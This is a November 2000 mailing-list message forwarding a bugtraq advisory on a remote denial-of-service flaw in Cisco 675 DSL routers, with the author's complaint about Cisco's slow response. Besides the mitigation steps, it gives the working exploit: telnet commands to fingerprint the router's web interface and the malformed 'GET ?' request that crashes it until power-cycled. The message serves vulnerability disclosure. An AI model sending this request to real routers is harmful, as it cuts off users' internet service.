Here's the bugtraq email on it: OK, since everyone is up-in-arms over vendor notification and their response times, here's an example of what happens if you give a vendor too -much- time. ----------------- Title : Cisco 675 Web Administration Denial of Service Device: Cisco 675 DSL Router Class : Denial of Service (remote) Vendor Notified: January 10th, 2000 (Yes folks, 11 months ago) Patch Available: Nope - see below --------------------------------- The Cisco 675 DSL routers with the Web Administration Interface enabled can be crashed (hard) using a simple GET request. CBOS versions 2.0.x through 2.2.x have been found to be vulnerable. The new CBOS 2.3.x has not been tested, but there are no notes in the 2.3.x changelogs to indicate that they've fixed this problem. Effected 675s were configured in PPP mode. The 'Web Administration Interface' is enabled by default in CBOS revisions 2.0.x and 2.2.x. The Cisco 67x series of DSL routers are produced and distributed for specific telcos to offer to their clients and as such, the installation base is quite large. (To hazzard a guess, if just 20% of all Qwest DSL users are using Cisco 675s, the installation base would exceed 25,000) The DSL adapters in this series include: Cisco 673, Cisco 675, Cisco 675e, Cisco 676, Cisco 677, and Cisco 678. This advisory applies specifically to the 675 but other adapters in this series may have similar problems and should be tested for vulnerability to this type of attack. I would be interested in the results if someone has access to and can test the other adapters in this series. The CBOS codebase is an aquired OS and as such, has no relationship at all to the main Cisco IOS codebase. Fix First: Disable the Web Based Administration Interface in your 675 until a patch or CBOS revision is made available. Web Server Disable commands: (2.0.x or better) (CBOS 'enable' mode) cbos# set web disabled cbos# write cbos# reboot Exploit: First find a 675 with the Web Admin server running. Fingerprint: telnet vic.tim.ip.addr 80 Connected to vic.tim.ip.addr. Escape character is '^]'. GET / HTTP/1.0 HTTP/1.0 401 Unauthorized Content-type: text/html WWW-Authenticate: Basic realm="CISCO_WEB" <CENTER><h1>Unauthorized Access 401</h1></center> Connection closed by foreign host. Now kill it: telnet vic.tim.ip.addr 80 Trying vic.tim.ip.addr... Connected to vic.tim.ip.addr. Escape character is '^]'. GET ? [LF][LF] (your telnet session dies here, and so does the router) Dead as a post: ping -c5 vic.tim.ip.addr PING vic.tim.ip.addr (vic.tim.ip.addr): 56 data bytes 5 packets transmitted, 0 packets received, 100% packet loss The Cisco never recovers - it's hosed until the router is power-cycled. A simple 'GET ? \n\n' is all it takes to kill the router. In case you're wondering, I had meant to enter 'GET /', but my finger slipped on the shift key. Neat eh? VENDOR RESPONSE: None, and I'll tell you why. (Warning, long rant ahead that has nothing to do with the guts of this advisory.) I first notified 'security-alert at cisco.com' in January of this year. Got an immediate response and all seemed well. Then I didn't hear back from them for a couple of months and promptly forgot all about this. Then in April the 'Cisco IOS Software TELNET Option Handling Vulnerability' (see http://www.securityfocus.com/archive/1/56207) was announced. This vulnerability was very similar to the Cisco 675 problem and I re-contacted Cisco. They claimed they were "still working on replicating the error". Uh, OK, whatever. I placed it on the back-burner and promptly forgot all about it again because I didn't want to announce this vulnerability until a vendor approved fix was available. (The installation base for this adapter is humongous) Then in October of this year some discussion of a potential problem with the Cisco 678 occured on the VULN-DEV mailing list. A Cisco rep on the list had the audacity to complain about prior-notification. (Never mind that VULN-DEV is designed specifically to investigate potential vulnerabilities) Anyway, the issue was again brought before Cisco, they again promised to address this issue. The conversation on VULN-DEV prompted some private correspondence with CORE SDI. The last I heard from Cisco was actually by way of Iván Arce at CORE SDI who wanted more information regarding the Cisco 675 problem while he investigated the CISCO IOS and it's Web Admin bugs. (See CORE-20002510, BugTraq ID 1838) The vulnerabilities are strikingly similar even though IOS is a completely separate codebase from CBOS. Anyway, CORE got word from Cisco PSIRT that they would be addressing this issue by "mid November". Needless to say, this hasn't happened yet. This week's discussion of vendor notification and response times was just gravy. It should also be noted that since January, Cisco has released at least 2 updates to the CBOS 2.x series, without addressing this issue. (no mention of it in their changelogs, although to be fair I've yet to have the opportunity to test this bug against either 2.3.0 or 2.3.5.) CDI ____________________________________ The Web Master's Net http://www.thewebmasters.net/ "Ok spammer, I'll 'just hit delete'. You can be 'Delete'." -- Ron "SuperTroll" Ritzman, NANAE > -----Original Message----- > From: Bill Layer [mailto:b.layer at vikingelectronics.com] > Sent: Wednesday, November 29, 2000 1:33 PM > To: tclug-list at lists.real-time.com > Subject: Re: [TCLUG] Where's CBOS 2.3.5 > > > Hi, > > On Wednesday 29 November 2000 13:12, you wrote: > > Now's the time to upgrade too. In case anyone here doesn't follow > > bugtraq, you can nuke a 675 with the web-port enabled if > it's 2.0.x - > > 2.2.x. Requires a powercycle to get it running again. > > Do you have an abstract on that? Don't recall what version I > run, but I > *don't* have web enabled... just curious. > > -- > Bill Layer > Sales Technician > <b.layer at vikingelectronics.com> > > +----------------------------------+ > Viking Electronics, Inc. > 1531 Industrial St. > Hudson, WI. 54016 - U.S.A > 715.386.8861 ext. 210 > <http://www.vikingelectronics.com> > +----------------------------------+ > > "Telecom Solutions for the 21st Century" > Powered by Slackware Linux 7.1.0 > > _______________________________________________ > tclug-list mailing list > tclug-list at lists.real-time.com > https://mailman.real-time.com/mailman/listinfo/tclug-list >